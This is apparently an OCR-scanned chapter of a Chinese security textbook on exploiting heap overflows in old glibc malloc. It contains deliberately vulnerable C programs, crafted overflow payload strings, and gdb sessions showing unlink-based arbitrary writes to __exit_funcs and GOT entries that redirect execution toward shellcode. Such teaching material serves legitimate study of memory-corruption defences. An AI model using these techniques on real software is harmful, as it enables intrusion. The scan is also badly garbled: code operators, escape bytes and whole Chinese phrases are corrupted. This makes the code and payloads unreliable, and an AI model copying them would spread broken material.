Doug Lee 对 dlmalloc 做 过 很 好 的 总 结 ， 可 以 阅读 http:/gee.cs.oswego.edu/dyhtml/malloc.html 来 
了 解 相 关内 容 。 如 果 你 还 不 熟悉 Doug Lee 的 malloc 实 现 ， 建 议 在 继续 学 习 前 先 读 一 下 这 篇 文章 。 
虽然 文章 中 的 某 些 内 容 可 能 超出 你 需要 掌握 的 范围 ， 但 dlmalloc 包 括 的 适用 于 各 种 情况 的 多 线程 
和 优化 等 技术 已 经 融合 到 最 新 的 glibc 中 了 ， 因 此 具有 一 定 的 参考 意义 。 


5.4 EtA 


程序 在 运行 时 ， 每 个 线程 都 会 有 一 个 栈 , 用 来 保存 局 部 变量 。 但 对 全 局 变量 或 太 大 的 变量 来 
说 ， 栈 就 显得 不 太 适 合 了 ， 这 个 时 候 就 需要 使 用 另外 的 内 存 区 域 来 保存 它们 。 事 实 上 ， 有 些 程序 
在 编译 时 并 不 能 确定 它 将 要 使 用 多 大 的 内 存 , 而 一 般 是 在 运行 时 , 通过 特殊 的 系统 调用 来 动态 分 
配 。 一 个 典型 的 Linux 程 序 通 常 包括 .bss 段 ( 未 初始 化 的 全 局 变量 )、.data 段 (已 初始 化 的 全 局 
变量 ) 和 其 他 的 、 用 brk() 或 mmap () 等 系统 调用 分 配 的 、 由 malloc () 使 用 的 一 些 段 。 你 可 以 用 
gdb 的 maintenance info sections 命 令 查看 这 些 段 信息 。 尽 管 一 般 人 都 认为 由 malloc () 分 配 
的 段 才 是 真正 的 堆 ， 但 在 我 们 看 来 ， 任 何 可 写 的 段 都 可 以 看 作 堆 。 作 为 一 名 黑客 ， 不 应 该 纠缠 于 
细 枝 末节 ， 而 是 把 精力 放 在 那些 可 提供 获取 控制 机 会 的 、 任 何 可 写 的 内 存 页 上 。 

把 basi cheep 装 入 gdb， 执 行 maintenance info sections: 

(gdb) maintenance info sections 


Exec file: 
^/home/dave/BOOR/basicheap', file type elf32-i386. 


0x08049434->0x08049440 at 0x00000434: .data ALLOC LOAD DATA HAS_CONTENTS 
0x08049440->0x08049444 at 0x00000440: .eh frame ALLOC LOAD DATA HAS CONTENTS 
0x08049444->0x0804950c at 0x00000444: .dynamic ALLOC LOAD DATA HAS CONTENTS 
0x0804950c->0x08049514 at 0x0000050c: .ctors ALLOC LOAD DATA HAS CONTENTS 
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0x08049514->0x0804951c at 0x00000514: .dtors ALLOC LOAD DATA HAS CONTENTS 
0x0804951c-20x08049520 at 0x0000051c: .jcr ALLOC LOAD DATA HAS CONTENTS 
0x08049520-20x08049540 at 0x00000520: .got ALLOC LOAD DATA HAS, CONTENTS 
0x08049540->0x08049544 at 0x00000540: .bss ALLOC 
一 Y ALAS 

下 面 显 示 的 内 容 是 运行 追踪 后 的 输出 : 

brk(0) = 0x80495a4 

brk(0x804a5a4) = 0x804a5a4 

brk (0x804b000) = 0x804b000 


下 面 是 这 个 程序 的 输出 ， 显 示 出 程序 分 配 的 两 个 空间 的 地 址 ， 
buf-0x80495b0 buf2-0x80499b8 
下 面 是 再 次 运行 maintenance info sections 后 的 输出 ， 显 示 了 在 这 个 程序 运行 时 使 用 的 
段 。 注 意 观 察 栈 段 〈 最 后 一 个 ) 和 包括 它们 自己 指针 的 段 (load2 )。 ce 


0x08048000-20x08048000 at 0x00001000: loadl ALLOC LOAD READONLY CODE HAS CONTENTS 





0x08049000->0x0804a000 at 0x00001000: load2 ALLOC LOAD HAS CONTENTS 


Oxbfffe000-20xc0000000 at 0x0000f£000: loadil ALLOC LOAD CODE HAS CONTENTS 


(gdb) print/x $esp 
$1 = Oxbffff190 


堆 怎样 工作 

程序 在 运行 过 程 中 ， 需 要 更 多 的 内 存 时 ， 如 果 用 brk() 或 mmap () 进 行 处 理 ， 效 率 不 高 而 且 比 
较 复 杂 。 因 此 , 当 程序 需要 分 配 或 释放 内 存 时 , libc 为 程序 员 提 供 malloc() ,realloc() 和 free() 。 

在 接 到 请 求 时 《〈 例 如， 如 果 用 户 请 求 1000 字 节 )，malloc () 把 brk() 分 配 的 大 内 存 块 分 成 小 
块 ， 并 将 合适 的 块 分 给 用 户 ， 也 可 能 会 把 一 大 块 分 成 两 小 块 来 满足 用 户 的 需求 。 同 样 ， 当 调用 
free() 时 ， 它 会 判断 新 释放 的 块 是 否 可 以 与 其 他 块 合并 ， 这 个 处 理 过 程 会 减 小 碎片 (许多 正在 
使 用 的 块 散布 在 空闲 的 小 块 中 )， 从 而 从 根本 上 防止 程序 频繁 使 用 prk () 。 

为 使 运行 更 有 效率 ， 几 乎 所 有 的 malloc () 实现 都 会 用 元 数据 保存 块 的 位 置 、 大 小 或 与 小 块 
有 关 的 特殊 数据 。dlmalloc 用 存储 桶 保存 这 些 元 数据 ， 还 有 些 malloc 实 现 用 平衡 树 结构 保存 它们 。 
如 果 你 不 知道 平衡 树 结构 怎样 工作 ， 不 要 担心 ， 因 为 如 果 你 确实 需要 了 解 它 ， 肯 定 会 花 些 时 间 来 
查阅 相关 资料 ， 但 也 许 你 根本 就 不 需要 它 。 

这 些 元 数据 一 般 保存 在 两 个 地 方 ; malloc() 实现 自己 使 用 的 全 局 变量 ， 分 配给 用 户 的 内 存 
块 的 前 / 后 位 置 。 就 像 栈 溢 出 里 帧 指针 和 指令 指针 保存 在 能 溢出 的 缓冲 区 后 面 的 情形 ， 堆 把 重要 
的 数据 (包括 内 存 状态 ) 直接 保存 在 分 配给 用 户 的 缓冲 区 之 后 。 


5.2 发现 堆 溢 出 


术语 堆 溢出 可 用 于 多 种 漏洞 原 语 。 在 寻找 漏洞 的 过 程 中 ， 跟 着 程序 员 做 总 会 有 所 收获 ， 因 为 
通过 亲自 尝试 , 我 们 可 能 会 在 没有 源码 的 情况 下 发 现 他 所 犯 的 错误 。 下 面 列 的 是 一 些 常见 的 错误 ， 
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尽管 不 是 很 详细 ， 但 都 是 一 些 真实 的 例子 。 
O samba〈 程 序 员 允许 将 大 内 存 块 复制 到 想 要 的 地 方 ); 


memcpy (array [user_ supplied int], user supplied buffer, user supplied int2); 


a Microsoft IIS: 
buf-malloc(user supplied int-1); 
memcpy (buf,user buf,user supplied int); 
Q IIS: 
buf=malloc(strlen(user_buf+5)); 
strcpy(buf,user buf); 
a Solaris Login: 
buf-(char **)malloc(BUF, SIZE); 
while (user buf[i]!-0) ( 
buf[il-malloc(strlen(user buf[il])*1); 
itt; 
H 
Q Solaris Xsun: 
buf-malloc(1024); 
strcpy(buf,user supplied); 
这 是 整数 溢出 与 堆 涪 出 最 常见 的 结合 形式 ， 分配 0 字 节 的 缓冲 区 并 把 很 大 的 数 复制 到 它 里 面 
(R25 — Fxdr array). 
bufzmalloc(sizeof(something)*user controlled, int); 
for (i20; i«user controlled int; i++) { 
if (user buf[i]--0) 
break; 
- copyinto(buf,user buf); 
H 
从 这 个 意义 上 说 ， 你 能 破坏 的 内 存 区 域 (不 在 栈 上 ) 里 随时 都 可 能 发 生 堆 溢出 。 因 为 破坏 因 
素 实在 太 多 了 ， 想 通过 查找 (grep) 的 方法 或 编译 器 的 纠 错 能 力 来 纠正 它们 几乎 是 不 可 能 的 。 
X£ree () 错 误 也 是 堆 溢出 的 一 种 ， 但 我 们 不 准备 在 这 章 仔 细 讨 论 ， 更 多 内 容 请 参阅 第 18 章 。 


5.2.1. 基本 堆 溢出 


绝 大 多 数 堆 溢出 的 基本 原理 如 下 : 堆 和 栈 很 相似 ， 既 包含 了 数据 信息 ， 也 包含 了 用 来 控制 程 
序 理解 这 些 数据 的 维护 信息 。 我 们 所 要 掌握 的 技巧 ， 就 是 通过 malloc () 或 tree () 来 达到 目的 ; 
把 一 或 两 个 字 写 入 我 们 能 控制 的 内 存 地 址 。 

先 从 攻击 者 的 角度 分 析 下 面 的 程序 。 


/*notvuln.c*/ 
int 
main(int argc, char** argv) { 
char *buf; 
buf-(char*)malloc(1024); 
printf("buf-$p",buf); 
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strepy (buf,argv[1]); 
free(buf); 
} 


下 面 是 ltrace 的 输出 : 

[dave@localhost BOOK]$ ltrace ./notvuln “perl -e 'print "A" x 5000'° 

. libc start main(0x080483c4, 2, Oxbfffe694, 0x0804829c, 0x0804844: 
«unfinished 

el» 

malloc(1024) = 0x08049590 

printf("buf-$p") - 13 

strcpy(0x08049590, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) — Ox08049590 
free(0x08049590) = «void» 

buf=0x8049590+++ exited (status 0) +++ 


可 见 , 程序 没有 骨 演 。 这 主要 是 因为 ， 虽然 输 入 的 字符 串 改 写 了 很 多 数据 ,但 是 并 没有 改写 
free () 调用 所 需要 的 结构 。 
现在 让 我 们 看 一 个 有 问题 的 程序 。 


/*basicheap.c*/ 





int 

main(int argc, char** argv) { 
char *buf; 
char *buf2; 


buf-(char*)malloc(1024); 
buf2-(char*)malloc(1024); 
printf("buf-$p buf2=%p\n", buf, buf2); 
strcpy(buf,argv[1]); 
free(buf2); 
} . 
这 个 程序 与 上 个 程序 的 不 同 之 处 在 于 , 被 分 配 的 缓冲 区 位 于 受 溢出 影响 的 缓冲 区 之 后 。 注 意 ， 
这 里 有 两 个 缓冲 区 , 它们 在 内 存 里 相 邻 而 居 ， 当 第 一 个 缓冲 区 发 生 洲 出 时 将 会 改写 第 二 个 缓冲 区 
里 的 数据 。 竺 一 听 有 点 糊涂 ， 但 仔细 想 想 的 确 是 这 么 回 事 。 当 溢出 发 生 时 将 会 破坏 第 二 个 缓冲 区 
里 的 元 数据 ， 因 此 当 它 被 释放 时 ，malloc 的 收集 函数 可 能 会 访问 无 效 的 内 存 。 
[dave@localhost BOOK]$ ltrace ./basicheap ‘perl -e 'print "A" x 5000'^ 
. libc start main(0x080483c4, 2, Oxbfffe694, 0x0804829c, 0x0804845c 
«unfinished 
e» 
malloc(1024) 0x080495b0 
malloc(1024) 0x080499b8 
printf ("buf=%p buf2=%p\n", 134518192buf=0x80495b0 buf2=0x80499b8 ) = 29 
strcpy (0x080495b0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0x080495b0 
free(0x080499b8) = «void» 


--- SIGSEGV (Segmentation fault) --- 
+++ killed by SIGSEGV +++ 
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注解 一 旦 有 办 法 触发 堆 溢 出 ， 就 应 该 把 问题 程序 视 为 调用 malloc ()、free() 和 realloc() 的 
特殊 API。 为 了 写 一 个 成 功 的 攻击 程序 ， 你 应 该 操纵 写 入 缓冲 区 的 分 配 调 用 的 顺序 、 大 小 


和 数据 内 容 容 。 


在 这 个 例子 里 , 我 们 已 经 事先 知道 了 要 溢出 的 缓冲 区 的 长 度 及 程序 的 内 存 布局 , 但 在 许多 情 
况 下 ， 很 难 获取 这 些 信 息 。 如 果 缺 少 的 源 程 序 有 堆 溢出 问题 ， 或 者 开源 的 程序 有 非常 复杂 的 内 存 
布局 ， 那 么 探测 堆 溢 出 最 容易 的 方法 就 是 察看 程序 受到 不 同 长 度 攻击 之 后 的 反应 ， 而 不 是 在 程序 
调用 free() 或 malloc () 时 发 生 肝 省 后 ， 对 整个 程序 进行 逆向 分 析 去 试 着 找 出 缓冲 区 中 发 生 溢出 
的 地 方 。 当 然 ， 在 许多 情况 下 ， 如 果 我 们 想 编写 可 靠 的 攻击 程序 ， 确 实 需要 逆向 工程 的 支持 。 在 
这 个 例子 之 后 ， 我 们 将 学 习 在 更 复杂 的 情况 下 尝试 破解 。 


A dix 中 区 的 长 度 

(gdb) x/xw puf-4 将 显示 Duf 的 长 度 。 即使 在 编译 时 没有 保留 符号 ， 我 们 通常 也 可 以 在 内 
4 345A (XAAJPÁRSS) 的 起 始 位 置 ， 这 个 字 之 前 的 数据 就 是 缓冲 区 的 真实 长 度 . 

(gdb). x/xw. buf-4 

Ox80495ac: 0%00000409 

(gdb)- printf "€dXn",0x409 

1033 

丙 正 的 长 度 应 该 是 1032， 它 等 于 缓冲 区 的 长 度 1024B 加 上 闪 贮 块 信息 头 的 8B, 最 后 一 位 用 
来 指示 这 个 块 之 前 是 否 还 有 其 他 块 ,， 妇 果 它 被 置 位 ( 像 这 个 倒 子 一 样 ) ;那么 块头 部 就 没有 保 
厅 前 一 个 块 的 大 小 PRERAE ( 设 为 0) ， 表示 这 个 块 之 前 还 有 一 个 块 ， 而 且 buf-8 就 是 
前 一 个 块 的 大 小 。 倒 数 第 二 位 是 一 个 标记 ， 表 示 这 个 块 是 否 是 由 mnap0) 分 配 的 770 


怎样 欺骗 malloc () 从 而 使 它 处 理 改写 后 的 内 存 块 是 整个 问题 的 关键 。 首 先 ， 我 们 将 清除 被 
改写 块头 部 中 使 用 的 前 一 位 ， 然 后 把 “前 一 块 ”的 长 度 设 为 负数 ， 经 过 这 样 的 处 理 后 ， 就 可 以 在 
”缓冲 区 内 定义 自己 的 块 。 

malloc 实现 (包括 Linux 的 dlmalloc〉 都 把 额外 信息 保存 在 空闲 块 里 。 因 为 空闲 块 里 没有 用 户 
数据 , 所 以 也 常 在 这 里 保存 一 些 关 于 其 他 块 的 信息 。 空闲 块 中 作为 用 户 数据 空间 的 前 4B 是 一 个 前 
向 指针 ， 接 下 来 的 4B 是 一 个 后 向 指针 。 我 们 将 利用 这 些 指针 改写 任意 数据 。 

这 条 命令 运行 后 ， 堆 缓冲 区 buf 发 生 溢 出 ， 并 把 buf2 块 头 部 的 8B 改 成 0xfffffff0 与 
0xffffffff (前 一 个 块 的 长 度 )。 


注解 在 这 里 ， 不 要 忘 了 LIA32 的 little- endian 属 性 。 


在 某 些 版 本 的 RedHat Linux 里 ，Perl 有 时 把 字符 转换 成 等 价 的 Unicode 形 式 后 再 输出 ， 
因此 ， 在 碰 到 这 种 情况 时 ， 可 以 用 Python 代 替 Perl。 例 如 ， 可 以 在 gdb 里 用 如 下 的 方式 输出 
字符 。 

(gdb) run ‘python -c ‘print 

"A"*1024+"\Xff\xff\xff\xff"+"\xfO\xff\xff\xff"' 











52 ”发现 堆 溢出 75 


在 计算 下 一 个 块 的 _int_free() 指令 上 设置 断 点 就 可 以 跟踪 free() 的 行为 。( 为 了 找到 这 
个 指令 ， 可 以 先 把 块 的 大 小 设 为 0x01020304， 在 发 生 裔 站 的 地 方 应 该 可 以 找到 _int_free()。) 
可 以 看 到 ， 通 过 断 点 定位 的 指令 如 下 : 

0x42073fdd <_int_free+109>: lea ($edi,$esi,1),$ecx 

当 断 点 被 触发 时 ， 程 序 输 出 buf = 0x80495b0 buf2 = 0x80499b8， 然 后 中 断 。 


(gdb) print/x $edi 
$10 = Oxfffffff0 
(gdb) print/x $esi 
$11 = 0x80499b0 


从 上 面 的 内 容 我 们 可 以 看 到 ， 当 前 块 的 地 址 (buf) 保存 在 ESI, 块 的 大 小 保存 在 EDI。 注意， 
这 里 分 析 的 glibc free() 源 自 最 初 的 dlmalloc () ， 如 果 你 分 析 的 是 其 他 的 malloc () 实现， 那 要 
注意 了 ， 在 大 多 数 情况 下 ，free() 是 intfree 的 封装 ，intfree 将 接受 -- 个 “活动 场所 ”和 我 们 
要 释放 的 内 存 地 址 。 

先 来 看 两 条 指令 ，free () 例 程 通过 它们 寻找 前 面 的 块 。 


0x42073ff8 <_int_free+136>: mov Oxfffffff8(%edx),%eax 


0x42073ffb <_int_free+139>: sub $eax,S$esi 


在 第 一 条 指令 (mov Oxfffffff8(S$edx), teax) 里 ，%edx 是 我 们 正 准 备 释放 的 buf2 的 地 
址 0x80499b8， 在 它 之 前 的 8B 保 存 的 是 前 一 块 缓冲 区 的 大 小 ， 现 在 保存 在 seax 里 。 当 然 ， 我 们 
已 经 改写 了 这 个 值 。 在 一 般 情 况 下 ， 这 个 值 是 0， 现 在 被 改 成 了 0xffffffff(-1)。 

在 第 二 条 指令 (sub eax, sesi) 里 ，%esi 保 存 的 是 当前 块 的 头 部 地 址 。 我 们 从 当前 块 
的 地 址 减 去 第 一 个 缓冲 区 的 大 小 ， 就 可 以 得 到 前 一 块 的 头 部 地 址 。 当 然 ， 在 用 -1 改写 了 前 一 个 
缓冲 区 的 大 小 后 ， 系 统 不 可 能 像 原 来 那样 正常 工作 。 下 面 的 指令 〈unlink0 宏 ) 把 控制 权 交 给 我 
f]: 

0x42073ffd <_int_free+141>: mov 0x8 (%esi),%edx 

0x42074000 <_int_free+144>: add %eax,%edi 

0x42074002 <_int_free+146>: mov Oxc(%esi) ,%eax; UNLINK 


0x42074005 <_int_free+149>: mov $eax,0xc($edx); UNLINK 
0x42074008 « int free4«152»: mov %edx,0x8(%eax); UNLINK 


gsesi 被 修改 ， 用 来 指向 用 户 缓冲 区 里 的 一 个 已 知 位 置 。 在 接 下 来 的 执行 过 程 中 ， 当 以 sedx、 
gseax 为 参数 ， 把 数据 写 入 内 存 时 ， 我 们 可 以 控制 sedx 和 $%eax。 出 现 这 个 问题 的 症结 在 于 free () 
调用 ， 因 为 我 们 操作 的 buf2 的 块头 部 〈 想 想 buf2 的 内 部 区 域 ， 我 们 已 经 可 以 控制 它们 了 ) 是 内 
存 中 未 被 使 用 的 一 个 块 的 块头 部 。 

历经 千 辛 万 苦 ， 我 们 终于 找到 了 通 向 ü 由 王国 的 钥匙。 

下 面 的 run 命 令 ( 用 Python 设 置 第 一 个 参数 ) 首先 填充 buf, 接着 用 -4 的 补 码 改 写 buf2 块 头 部 ， 
然后 插入 4B 的 填充 数据 ， 就 可 以 把 sedx 设 为 ABCcCD， 把 seax 设 为 BFGHE 了 。 


(gdb) r ‘python -c 'print 
"A"*(1024) -" AXECNAXEENXE£ENXEE'" c" NAXEONXE£ENXEEAXEÉ"C"AAAAABCDEFGH" ' 
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Program received signal SIGSEGV, Segmentation fault. 
0x42074005 in , int free () from /lib/i686/1libc.so.6 
/x Sedx = 0x44434241 

/x Secx = 0x80499a0 

/XxX Sebx = 0x4212a2d0 

/x Seax = 0x48474645 

/x $esi = 0x80499b4 

: /x $edi = Oxffffffec 


NW PU DH ~ 


(gdb) x/4i Spc 
0x42074005 <_int_free+149>: mov %eax, 0xc (%edx) 
0x42074008 <_int_free+152>: mov %edx, 0x8 (%eax) 


现在 ，%eax 将 被 写 入 %edx+12，%edx 将 被 写 入 %eax+8。 如 果 这 个 程序 没有 sIGsEGV 处 理 程 
序 ， 应 该 确认 $eax 和 %edx 是 否 都 是 可 写 的 有 效 地 址 。 


(gdb) print "%8x", & exit_funcs-12 
$40 = (<data variable, no debug info> *) 0x421264fc 


当然 了 ， 因 为 定义 了 一 个 伪造 的 块 ， 所 以 也 需要 为 “前 一 块 ” 定 义 伪造 的 块头 部 , 不 然 的 话 ， 
intfree 可 能 会 崩溃 。 把 buf2 的 大 小 设 为 0xfffffff0(-16), 就 可 以 把 伪造 的 块 纳入 我 们 控制 的 
buf 范 围 之 内 ( 见 图 5-1)。 








分 配 的 空间 
E 空闲 的 空间 
[7] 浪费 的 空间 





无 碎片 堆 示例 
一 个 优秀 的 malloc 实 现 里 ， 大 多 数 的 空隙 都 被 汇集 合并 了 
























碎片 堆 示例 
反复 的 分 配 操作 遗留 了 不 好 合并 或 使 用 的 空闲 块 











图 5-1 破解 堆 
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he ^l 
把 前 几 段 的 内 容 综合 一 下 ， 得 到 : 
"A"# (1012})+"\Xxff"*4+"A"*8+"\Xxf8\xff\xff\xff"+"\xfO\xff\xff\xff"+"\xff\xf 
f£\xff\xff"*2+intel_order (word1)+intel_order (word2) 


word1+12 将 被 word2 改 写 , word2+8 将 被 word1 改 写 。( 为 了 在 游 出 里 使 用 , intel_order() 
将 把 数据 转换 为 little-endian 字 符 串 ， 就 像 这 个 例子 里 的 一 样 。) 

最 后 所 要 做 的 就 是 选择 想 改 写 的 字 , 以 及 用 什么 改写 它 。 在 这 个 例子 里 ,basicheap 释 放 buf2 
之 后 将 直接 调用 exit () 。 这 个 exit 函 数 是 析 构 函数 ， 可 以 把 它 当 作 函 数 指针 来 使 用 。 


(gdb) print/x _ exit funcs 
$43 = 0x4212aa40 


正好 可 以 把 这 个 地 址 当 作 woras1,， 把 栈 上 的 地 址 作为 word2。 把 这 些 作为 参数 重新 运行 溢出 ， 
导致 : 


Program received signal SIGSEGV, Segmentation fault. 
OxbfffffOf in ?? () 


可 见 ， 我 们 已 经 把 执行 重 定向 到 栈 。 如 果 这 是 一 个 本 地 堆 溢出 ， 并 且 栈 可 执行 ,那么 游戏 就 
到 此 为 止 了 。 


5.2.2 ”中 级 堆 溢 出 


本 节 将 探究 前 面 详 细 介 绍 过 的 、 表 面 上 看 起 来 很 简单 的 堆 溢出 变种 。 目 标 程序 将 调用 
malloc ()， 而 不 是 前 面 介绍 的 free ()， 这 将 使 代码 以 完全 不 同 的 路 径 执行 ， 并 以 一 种 更 为 复杂 
的 方式 对 溢出 做 出 反应 。 我 们 将 在 下 面 介绍 怎样 利用 这 个 漏洞 ， 希 望 这 个 例子 对 你 有 所 启发 ， 也 
希望 你 能 通过 这 个 例子 学 会 换 位 思考 。 有 些 人 只 能 控制 非常 少 的 东西 , 但 他 们 通过 仔细 检查 内 存 
发 生 恶化 的 过 程 ， 就 可 以 找到 潜在 的 代码 执行 路 径 。 

尽管 现在 目标 程序 调用 的 是 malloc () 而 不 是 free ()， 但 是 你 会 发 现 ， 下 面 所 述 的 可 破 
解 的 堆 结 构 代 码 和 前 面 描述 的 类 似 ， 只 是 洲 出 后 的 处 理 过 程 变 得 更 复杂 了 。 相 比 free() 
unlink() 错 误 来 说 ， 如 果 你 不 想 碰 到 太 多 的 挫折 ， 那 么 有 必要 在 gdb 上 为 这 个 堆 溢 出 变种 多 
花 点 时 间 。 


/*heap2.c - a vulnerable program that calls malloc() */ 
int 
main(int argc, char **argv) 


{ 
char * buf, *buf2, *buf3; 


buf=(char*)malloc(1024); 

buf2=(char*)malloc(1024); 

buf3-(char*)malloc(1024); 

free(buf2); 

strcpy (buf,argv[1]); 

buf2=(char*)malloc(1024); //this was a free() in the previous example 
printf("Done."); //we will use this to take control in our exploit 


) 
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注解 当 我 们 模糊 测试 程序 时 ， 同 时 使 用 0x41 和 0x50 是 十 分 重要 的 ， 因为 在 某 些 情况 下 0x41 不 
会 触发 堆 溢 出 (把 块头 部 的 previous-flag 或 mmap-flag 设 为 1 不 太 好 ， 因 为 这 将 防止 程 
AK 3t. 从 而 使 模糊 测试 失去 意义 )。 更 多 有 关 模 糊 测 试 的 信息 请 参考 第 17 章 . 











要 想 使 这 个 程序 骨 溃 ， 只 需 把 heap2 载 入 gdb 里 ， 并 执行 下 列 命令 : 


(gdb) r “python -c 'print 
"\x50"*1028+"\x££"*4+"\xa0\xff\xffi\xbf\xa0\xfi\xfi\xbf"'~ 











注解 在 Mandrake 和 其 他 一 些 系统 上 ， 找 出 _exit _funcs 有 一 定 难 度 。 可 以 在 <_ cxa_atexit+ 
45>: mov %eax, 0x4 (%edx) 上 设置 断 点 ， 当 触发 断 点 时 ，%edx 里 的 内 容 应 该 就 是 你 所 需 


想 滥用 malloc 是 相当 困难 的 ， 最 终 你 将 会 进入 一 个 和 下 面 类 似 的 _ int_malloc() 循 环 。 当 
然 ， 你 的 malloc () 实现 可 能 像 glibc 版 本 那样 有 稍 许 的 改变 。 在 下 面 的 代码 里 ，bin 是 你 要 改写 的 
块 的 地 址 。 


bin = bin_at(av, idx); 


for (victim = last (bin); victim != bin; victim = victim->bk) ( 


size = chunksize (victim); 


if ((unsigned long) (size) >= (unsigned long) (nb)) { 
remainder size = size - nb; 
unlink(victim, bck, fwd); 


/* Exhaust */ 
if (remainder size < MINSIZE) { 
set inuse bit at offset(victim, size); 
if (av != &main arena) 
victim->size |= NON MAIN ARENA; 
check malloced chunk(av, victim, nb); 
return chunk2mem(victim); 
3 
/* Split */ 
else { 
remainder = chunk_at_offset(victim, nb); 
unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder; 
remainder->bk = remainder->fd = unsorted_chunks (av); 
set_head(victim, nb | PREV_INUSE | 
(av != &main arena ? NON MAIN ARENA : 0)); 
set head(remainder, remainder size | PREV INUSE); 
set foot(remainder, remainder size); 
check malloced chunk(av, victim, nb); 
return chunk2mem(victim); 
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} 
} 


这 个 循环 可 以 写 入 各 种 内 存 ， 然 而 ， 如 果 只 能 写 入 非 零 字符 ， 将 很 难 退 出 循环 。 为 什么 会 这 
FR? 主要 是 因为 退出 循环 需要 具备 两 个 条 件 ， 其 一 是 无 论 在 什么 情况 下 都 要 求 fakechunk-> 
size minus size 小 于 16B， 其 二 是 伪造 块 的 下 一 个 指针 应 该 和 被 请 求 块 的 下 一 个 指针 是 一 样 的 。 
如 果 目 标 系 统 没有 信息 泄露 错误 ， 要 想 猜 出 被 请 求 块 的 地 址 几乎 是 不 可 能 的 ， 即 使 有 可 能 ， 也 会 
非常 困难 (需要 很 长 时 间 的 暴力 猜测 )。Halvar Flake 曾 说 “优秀 的 黑客 寻找 信息 泄露 错误 ， 因 为 
它们 使 攻击 更 可 靠 、 更 容易 ”。 

这 段 代码 看 起 来 有 点 乱 , 但 是 通过 把 伪造 块 设置 为 相同 的 长 度 , 或 者 把 伪造 块 的 后 向 指针 设 
为 最 初 的 bin， 就 能 比较 简单 地 利用 它们 。 你 可 以 从 溢出 的 后 向 指针 得 到 最 初 的 bin (heap2.c 
很 好 地 显示 了 它们 )， 但 远程 攻击 过 程 中 很 难 利用 。 因 此 ， 这 个 方法 在 本 地 攻击 时 很 稳定 ， 但 它 
不 是 攻击 这 类 漏洞 的 最 简单 方法 。 

下 面 的 攻击 包含 了 本 地 攻击 具有 的 两 个 特征 。 

a 用 极 微小 的 精确 度 改写 free () 'd 块 的 指针 ， 使 指针 指向 环境 变量 里 指定 的 、 位 于 栈 上 的 

伪造 块 ， 而 且 用 户 可 以 控制 并 精确 定位 这 个 块 。 

口 用 户 的 环境 变量 里 可 以 包含 909， 这 对 我 们 来 说 是 很 重要 的 ， 因 为 破解 使 用 的 长 度 等 于 被 请 

求 的 长 度 ， 在 这 里 是 1024B 〈 因 为 还 有 一 个 块头 部 ， 所 以 还 要 加 上 8B)。 这 需要 把 空 字 节 
插入 头 部 。 

下 面 的 攻击 代码 就 是 这 样 做 的 。 它 在 malloc () 调用 完成 前 , 先 改写 保存 在 块头 部 里 的 指针 ， 
然后 欺骗 maLloc () ， 使 其 重 定向 到 被 改写 的 函数 指针 〈 对 于 printf() 来 说 ， 是 Global Offset 
Table 的 条 目 )， 最 后 由 printf () 把 执行 重 定向 到 shellcode， 在 这 个 例子 里 是 0xcc， 也 就 是 调试 
中 断 int3。 对 齐 对 缓冲 区 很 重要 ， 它 们 将 因此 而 不 会 有 较 低 位 置 的 地 址 (例如 ， 我 们 不 想 让 
malloc () 认为 缓冲 区 是 由 mmappeda( ) 分 配 的 或 “前 一 块 ” 的 指示 位 被 置 位 )。 

heap2xx.c — exploit for heap2.c 

对 这 个 攻击 来 说 ， 有 两 种 可 能 。 

(1) glibe 2.2.5， 人 允许 把 一 个 字号 入 任何 一 个 字 。 

(2) glibc 2.3.2， 人 允许 把 当前 块头 部 的 地 址 写 入 指定 的 内 存 她 址 。 这 样 做 以 来 使 破解 更 困难 ， 
但 仍 有 被 破解 的 可 能 。 

注意 ， 在 任何 条 件 下 ， 这 个 攻击 代码 都 不 会 产生 shell。 它 在 破解 成 功 时 ， 通 常会 因为 执行 
无 效 的 指令 而 导致 seg-fault。 当 然 ， 为 了 得 到 可 用 的 shell， 只 需 把 shellcode 复 制 到 合适 的 位 
置 即 可 。 

我 们 针对 glibc 2.3.2 列 出 了 以 下 清单 ， 并 增加 了 一 些 内 容 ， 用 来 帮助 大 家 了 解 glibc 2.2.5 和 
glibc 2.3.2 之 闻 的 不 同 ， 也 希望 你 意识 到 ， 当 遇 到 类 似 问 题 时 ， 列 出 清单 并 做 详细 的 注解 会 使 你 
受益 良 多 。 

a 覆盖 空闲 的 puf2 的 malloc 块 标记 后 ， 就 使 fa〈 前 向 指针 ) Albk (后 向 指针 ) 字段 〈 以 eax 

AF) 指向 了 一 个 我 们 可 以 完全 控制 的 空闲 块 。 注 意 ， 要 确保 > 1032 + 4 块 有 env 的 偏 
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移 ， 以 维持 orl $0x1, 0x4 (%eax,g%esi,1) 运 行 ， 其 中 esi 寻 到 的 地 址 为 eax 地 址 ， 而 eax 
被 设 为 1032。 
D 当下 一 次 malloc 调 用 1024 内 存 区 域 时 ， 它 〈 堆 分 配 代码 ) 将 落 入 我 们 伪造 的 bin 区 域 ， 并 
处 理 这 个 已 被 我 们 完全 控制 的 双向 链表 的 空闲 块 一 一 tagz0r。 
O 使 pk、ftq ptr 和 伪造 的 env 块 的 prev_size (0xfffffffc) 字 段 对 齐 ， 以 确保 不 论 使 用 什 
么 指针 宏 ， 程 序 都 可 以 继续 运行 。 
Q 通过 使 s < chunksize (FD) 的 检查 失败 来 退出 循环 ， 可 以 在 env 块 里 把 大 小 字段 设 为 1032 
来 达到 目的 。 
O 在 这 个 循环 里 ，%ecx 像 这 样 写 入 内 存 : mov tecx, 0x8 (%eax)。 
可 以 在 以 printf 的 Global Offset Table (GOT) 条 目 〈 在 这 个 例子 里 是 0x080496d4》 为 例 的 
测试 里 确认 这 些 行为 。 在 运行 过 程 中 ， 可 以 把 伪造 块 的 bk 字段 设置 为 0x08049644-8， 得 到 下 面 
的 结果 : 


(gdb) x/x 0x080496d4 
0x80496d4 « GLOBAL OFFSET TABLE 420»: 0x4015567c 


如 果 在 eax 无 效 时 查看 ecx 的 数据 ， 会 看 到 : 


(gdb) i r eax ecx 





eax 0x41424344 1094861636 

ecx 0x4015567c 1075140220 

(gdb) 

我 们 改变 了 程序 的 执行 流程 ， 使 heap2 .c 在 执行 时 ， 一 碰 到 printf 就 跳 到 main_arena〔 由 
ecx 指 向 的 地 址 )。 

HAHH, JEFA T o 

(gdb) x/i$pc 

0x40155684 <main_arena+100>: cmp $b1,0x96cc0804 (%ebx) 


(gdb) disas $ecx 
Dump of assembler code for function main_arena: 


